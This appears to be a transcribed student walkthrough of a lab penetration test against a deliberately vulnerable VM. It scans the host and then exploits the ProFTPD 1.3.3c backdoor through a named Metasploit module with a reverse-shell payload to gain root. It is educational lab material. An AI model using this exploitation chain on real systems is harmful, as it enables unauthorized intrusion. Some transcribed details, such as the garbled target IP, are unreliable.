Hello everyone, my name is Osei-Nimoh, and in this walkthrough, I'll be demonstrating a basic penetration test, again basic Pentesting 1 vulnerable machine from Vault Hub. In this demonstration, strictly for educational purposes, this objective is to walk through standard penetration testing methodology, including host discovery, enumeration, exploitation, and post-exploitation verification on a deliberately vulnerable system. I would also like to give a special shout out to Dr. Wesley Phillips, who taught me these tools, techniques, and his methodology throughout this walkthrough. So first, we're going to start by identifying the IP address for our attack machine using the command IPA. And then once we have our IP machine, which is 172.20.10.11, after that, we're going to do a host discovery scan using the command sudo net discover. Alright, so when I have ran that scan, as you can see here, I can have my target machine IP address, which is 172.20.10.9, and we have a MAC address over here of it. So as you can see, now we have to identify our system. So what we would like to do next is ping our target machine to see if there's a live ping. So we're going to be using the command fping 172.20.10.9. And then once we have found out our ping is a live, now we want to do a nmap scan. So this nmap scan will reveal which ports are open and how many ports are closed and the version of it. So once we have ran our correct nmap scan, we can see that there are 3 ports open, the file transfer port, and then we have the Pro FTPD version 1.3.3c, and then we also have the port 22, which is open, and port 80, which is our web port. And then now that we have that, we will now want to do is use the command search exploit. And then now we want to indicate which is a known backdoor vulnerability into our Pro FTPD version 1.3.3c. So as you can see here, we have a backdoor command execution within the Metasploit. So now we want to do is launch our MSF console, which is the Metasploit framework. So once we have opened our Metasploit console, we want to use the correct exploitation module. So we're going to be using the command use exploit /unix /ftp /pro ftpd _133c _backdoor. And then once we're in the correct module, now I want to correctly set our options. So if we're first going to be doing setting the R host to our target IP address, which is 172.1.20.1.9. Then we want to set L host to our Kali Linux machine, which is 172.20.10.11. Then we want to set our L port. And now I want to set the payload to a reliable reverse shell. So we're going to be using the command set payload cmd /unix /reverse. And then now we want to run to see if there's a shell connection using the command run. Alright, so after getting access to the shell, I can verify my level of access on the target system using the command who am I. And then that gives us a root, and then we can also connect to our ID. And then we can also use the command ls slash and see the different files within our target machine system. So in conclusion, the basic pen testing one target system was successfully compromised, and then root access was also achieved without authentication and full control of our system, which was obtained throughout this demonstration. And the serious posed by outdated and vulnerable services such as the Pro FTPD version 1.3.3c. And again, thank you to Dr. Wesley Phillips for teaching us how to do our face. In conclusion, the basic Pentesting 1 target machine was successfully compromised, and root access was achieved without any authentication, and full control of our system was also obtained. So this basically shows and demonstrates that there was a serious risk posed by the outdated and vulnerable services, such as the Pro FTPD version 1.3.3c, which was left unpatched. And again, thank you to Dr. Wesley for teaching us how to do our first basic pen test.